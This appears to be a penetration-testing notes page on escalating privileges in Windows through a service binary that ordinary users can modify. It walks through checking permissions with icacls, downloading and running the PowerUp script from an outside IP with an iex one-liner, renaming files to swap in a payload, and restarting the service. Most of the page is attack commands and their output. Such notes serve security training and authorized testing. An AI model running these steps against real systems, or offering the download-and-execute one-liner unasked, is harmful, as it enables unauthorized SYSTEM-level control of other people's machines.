Weak Service Binary Permissions

Enumerate Permission on Binary

C:\>icacls "C:\Setup\Vuln Service\VulnService.exe"
C:\Setup\Vuln Service\VulnService.exe BUILTIN\Administrators:(I)(F)
                                      NT AUTHORITY\SYSTEM:(I)(F)
                                      BUILTIN\Users:(I)(RX)
                                      NT AUTHORITY\Authenticated Users:(I)(M)

PowerUp

PS C:\> iex(new-object net.webclient).DownloadString('http://192.168.19.134/PowerUp.ps1')

[*] Checking service executable and argument permissions...

[*] Running Invoke-AllChecks

ServiceName                     : VulnService
Path                            : C:\Setup\Vuln Service\VulnService.exe
ModifiableFile                  : C:\Setup\Vuln Service\VulnService.exe
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'VulnService'
CanRestart                      : False

We better backup the original file before abuse, then we can replace payload

C:\Setup\Vuln Service>rename VulnService.exe VulnService.bak
C:\Setup\Vuln Service>rename Vuln.exe VulnService.exe

Once the service gets restarted, your payload should execute.

C:\>sc start vulnservice

PreviousWeak Service Permissions NextLinux

Last updated 1 year ago